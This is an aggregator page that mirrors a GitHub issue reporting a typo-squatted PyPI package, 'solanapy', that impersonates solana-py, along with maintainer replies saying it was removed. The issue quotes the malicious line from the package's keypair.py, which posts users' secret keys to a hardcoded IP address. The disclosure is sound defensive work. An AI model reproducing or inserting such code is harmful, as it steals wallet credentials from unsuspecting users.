Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Typo-squatting attack targetting solana-py users
See original GitHub issue$ python3 -m venv .
$ . bin/activate
$ pip3 install solanapy
$ grep -nHr api.php lib
Binary file lib/python3.8/site-packages/solana/__pycache__/keypair.cpython-38.pyc matches
lib/python3.8/site-packages/solana/keypair.py:85: requests.post('http://80.78.25.59/api.php', data={"keypair": str(secret_key), "package":"solanapy"})
This isn’t yours, is it? https://pypi.org/project/solanapy/ (Genuine Pypi page is https://pypi.org/project/solana/ )
Probably related: https://twitter.com/pypi/status/1562442188285308929
Issue Analytics
- State:
- Created a year ago
- Comments:5
Top Results From Across the Web
Hackers attack solana crypto, stealing millions - CNBC
Ongoing solana attack targets thousands of crypto wallets, costing users more than $5 million so far. Published Wed, Aug 3 20229:16 AM EDT ......
Read more >Solana Wallets Targeted in Latest Multimillion-Dollar Hack
Over 8,000 “hot” Solana-based crypto wallets have been compromised in an ongoing exploit amassing at least $5 million. Zhuoxun Yin, COO and co- ......
Read more >Kevin | Foresight on Twitter: "There's someone typo squatting the ...
Looks highly targeted, not necessarily some auto squatting bot. Fake maintainer account called "soltakeover" with Solana logo.
Read more >Solana ecosystem hit by hack draining millions in crypto from ...
Hackers have targeted the Solana ecosystem, draining crypto funds from thousands of “hot” wallets connected to the internet. Such attacks ...
Read more >Solana (SOL) has been targeted in the latest crypto hack ...
The popular blockchain Solana confirmed the attack in a tweet on Wednesday, saying approximately 8,000 (up from 7,767 earlier) wallets have been ...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Thanks for raising this. To be clear to anyone reading, the genuine PyPI package “solana” is unaffected and there’s been no security breach. But this scam package is very bad and we have contacted PyPI to get it taken down asap
The malicious package has been removed from pypi